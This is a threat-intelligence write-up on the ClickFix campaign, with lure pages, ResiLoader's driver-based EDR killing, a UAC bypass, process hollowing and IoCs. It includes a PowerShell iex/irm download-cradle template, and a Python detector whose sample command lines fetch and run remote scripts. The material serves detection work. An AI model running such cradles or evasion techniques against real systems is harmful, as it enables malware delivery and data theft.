ClickFix: Anatomy of a Cloudflare-Powered Social Engineering Campaign Using ResiLoader and BYOD Evasion

Threat actors are increasingly pivoting away from exploit-based delivery toward convincing social engineering campaigns known as ClickFix. By closely mimicking the visual identity of trusted ecosystems, specifically Google and Cloudflare verification pages, attackers trick users into running the first stage of the compromise themselves. These campaigns serve as a delivery vehicle for a diverse set of high-impact malware families, including StealC, HijackLoader, NetSupport RAT, and several previously undocumented loaders.

Recent threat intelligence analysis suggests these campaigns have been maturing since late 2025. Their primary objective is to sidestep automated security controls by leveraging the human element: rather than exploiting a software vulnerability to get past perimeter or endpoint defenses, the attacker persuades the user to run a PowerShell command, turning the user into the execution engine for the malware.

The Anatomy of the Attack Chain

The initial stage involves redirecting victims to fraudulent “Verify you’re human” or “Manual Verification Required” landing pages. These pages are architected to replicate the UX of Google reCAPTCHA, Google Meet prompts, or Cloudflare security challenges. To maintain high availability and evade domain reputation filters, attackers utilize a combination of repurposed domains, compromised legitimate websites, and Cloudflare Pages (.pages.dev) infrastructure.

Once the user is convinced they are performing a legitimate security check, they are instructed to copy and execute a malicious command via a terminal or PowerShell prompt. A typical command follows the pattern below: irm (Invoke-RestMethod) fetches the remote script as text and iex (Invoke-Expression) runs it in memory, so nothing is written to disk unless the fetched script chooses to do so.

powershell -c "iex(irm '{IP}:{Port}/{Path}')"

Forensic analysis has identified several ports used for this first-stage retrieval, including 6600, 9900, 5506, 7895, 7493, 149, and 8442. None of these is a standard HTTP(S) port, so outbound PowerShell connections to a raw IP address on one of them are a useful hunting signal. Some iterations also use the IClickFix framework to perform dynamic clipboard injection: the lure page writes the command to the victim's clipboard, so the user only has to paste it, which makes the attack more seamless and harder for the user to notice.
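The detection logic a practitioner would want at this point, as an added example that is not part of the article and not Malwarebytes' code: it runs over constructed process-creation command lines (documentation-range IPs, not real indicators), flags the iex/irm cradle in either order, pulls out the {IP}:{Port}/{Path} triple, and scores the port against the list reported above. The regexes, the Finding structure and the sample lines are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Ports the article reports for first-stage retrieval; none is a standard HTTP(S) port.
CLICKFIX_PORTS = {6600, 9900, 5506, 7895, 7493, 149, 8442}

# Execute and fetch cmdlets matched separately so both iex(irm ...) and irm ... | iex are caught.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.IGNORECASE)

# Dotted-quad host with optional scheme, port and path, matching the {IP}:{Port}/{Path} pattern.
IP_URL_RE = re.compile(
    r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?(/[^\s'\")]*)?"
)


@dataclass
class Finding:
    cmdline: str
    ip: Optional[str]
    port: Optional[int]
    path: str
    reasons: List[str] = field(default_factory=list)


def analyze_command(cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line looks like a ClickFix download cradle, else None."""
    if not (EXEC_RE.search(cmdline) and FETCH_RE.search(cmdline)):
        return None  # a fetch without an execute (or vice versa) is not a cradle
    finding = Finding(cmdline, None, None, "", ["iex+irm download cradle"])
    m = IP_URL_RE.search(cmdline)
    if m:
        finding.ip = m.group(1)
        finding.port = int(m.group(2)) if m.group(2) else None
        finding.path = m.group(3) or ""
        finding.reasons.append("script fetched from a raw IP address")
        if finding.port in CLICKFIX_PORTS:
            finding.reasons.append(f"port {finding.port} reported in ClickFix campaigns")
        elif finding.port not in (None, 80, 443):
            finding.reasons.append(f"non-standard port {finding.port}")
    return finding


def scan(cmdlines: List[str]) -> List[Finding]:
    """Run analyze_command over a batch of command lines and keep the hits."""
    return [f for f in map(analyze_command, cmdlines) if f]


# Constructed sample command lines (RFC 5737 documentation IPs; these are not real IoCs).
SAMPLE_CMDLINES = [
    "powershell -c \"iex(irm 'http://192.0.2.10:6600/a.ps1')\"",
    "powershell -w hidden -c \"Invoke-Expression (Invoke-RestMethod '198.51.100.7:8442/verify')\"",
    "cmd /c powershell -c \"irm '192.0.2.10:9900/' | iex\"",
    "powershell -c \"Get-ChildItem C:\\Users\"",
    "powershell -c \"irm https://example.com/x.json | ConvertFrom-Json\"",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f.ip}:{f.port}{f.path}  <-  {'; '.join(f.reasons)}")
```

The last two sample lines are deliberately benign (a plain cmdlet, and a fetch with no execute) so the rule's false-positive behaviour is visible; feed it Sysmon event 1 or PowerShell 4104 command lines in production.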

[Figure: “New sign-in with trusted token” ClickFix lure page (Source: Malwarebytes)]

The “SECURITY GATEWAY” Framework and Payload Modularization

The infection mechanism is driven by HTML templates containing obfuscated or plaintext PowerShell commands, such as CustomCaptcha or the SECURITY GATEWAY framework. The latter is modular, with components named GatewayRuntime, RemoteVault, and BeaconDispatcher. Notably, some variants include an “approval gate”: a real-time C2 dashboard from which the operator selects the payload to serve based on the victim's profile, so an analyst replaying the lure in a sandbox may not receive the same payload a real victim did.

[Figure: The “fix audio driver” Google Meet ClickFix lure (Source: Malwarebytes)]

Lures are context-aware, ranging from fake Google login alerts and QR code generators to Google Meet “fix audio driver” prompts. For instance, an endpoint such as /api/driver-clipboard.php can dynamically return an OS-specific payload tailored to the victim’s machine.

Upon execution, the initial PowerShell downloader drops a script (e.g., tmpXXXX.tmp.ps1) into the user's %TEMP% directory. That script creates a working directory at C:\ProgramData\Zooms, then fetches second-stage payloads from attacker-controlled IPs or Cloudflare R2 storage buckets. During this stage, host data may be posted to endpoints such as http://{IP}/dl-callback, so the callback is an early exfiltration indicator as well as a C2 one.

Observed Payload Mappings:

  • libEGL.zip: Delivers a trojanized Electron-based Franz application containing ResiLoader and StealC.
  • Test.msi: Deploys a Deno loader alongside a specialized PowerShell stealer.
  • arworks.zip: Delivers Amatera Stealer.
  • water-night.zip: Deploys Remus.
  • Setup.msi / Invintrum_first.msi: Installs NetSupport RAT.
  • traffic1.msi / ibrowser.exe: Deploys CastleLoader and a Rust-based stealer via DLL hijacking.

Advanced Evasion: ResiLoader and BYOD Techniques

A critical development in this campaign is the introduction of ResiLoader. Implemented as an obfuscated .NET NativeAOT DLL (msys-crypto-3.dll), it uses a “Bring Your Own Driver” (BYOD) technique, more commonly called BYOVD (Bring Your Own Vulnerable Driver): it loads the pcdhost.sys driver and uses the kernel-level access it provides to disable over 140 individual AV/EDR processes, effectively blinding the host's security stack. Because NativeAOT compiles the .NET code ahead of time to native machine code, the DLL carries no IL for managed-code scanners to inspect.

ResiLoader establishes persistence via a Run registry key and the C:\ProgramData\Google Update directory, a path presumably chosen to blend in with legitimate Google updater artifacts. It then escalates privileges through the ICMLuaUtil COM interface, a well-known UAC bypass that abuses the auto-elevated CMSTPLUA COM object, and finally performs process hollowing to inject the StealC stealer into ServiceModelReg.exe, a signed .NET Framework utility that rarely runs in normal user sessions.

[Figure: “QR Code” ClickFix lure page (Source: Malwarebytes)]

Technical Indicators of Compromise (IoCs)

Type      Indicator / Value                                  Notes
Malware   ResiLoader DLL                                     New .NET NativeAOT loader; uses pcdhost.sys for EDR evasion.
Hash      72907d0ca3258365838626f6a8d993a6                   ResiLoader DLL sample (MD5).
Malware   StealC                                             Info-stealer, injected via process hollowing into ServiceModelReg.exe.
Hash      0234E3188F2883A438B3F2BEAB7A78B2                   StealC payload (MD5).
Malware   NetSupport RAT                                     Installed via MSI files.
Hash      eee416efcb1e33f220cdb4b05496a07a                   NetSupport sample (MD5).
Infra     onegeekworld[.]com, antibotv3[.]com                Host fake verification pages.
Infra     *.pages[.]dev (various subdomains)                 Cloudflare Pages used for lure hosting.
Infra     pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev      Cloudflare R2 payload storage.
Infra     151.240.151[.]126, 85.239.149[.]16                 Active payload distribution IPs.

Note: All IP addresses and domains have been defanged (e.g., using [.]) to prevent accidental resolution. The *.pages[.]dev entry also matches legitimate Cloudflare Pages sites, so treat it as a hunting pattern rather than a block-list entry.
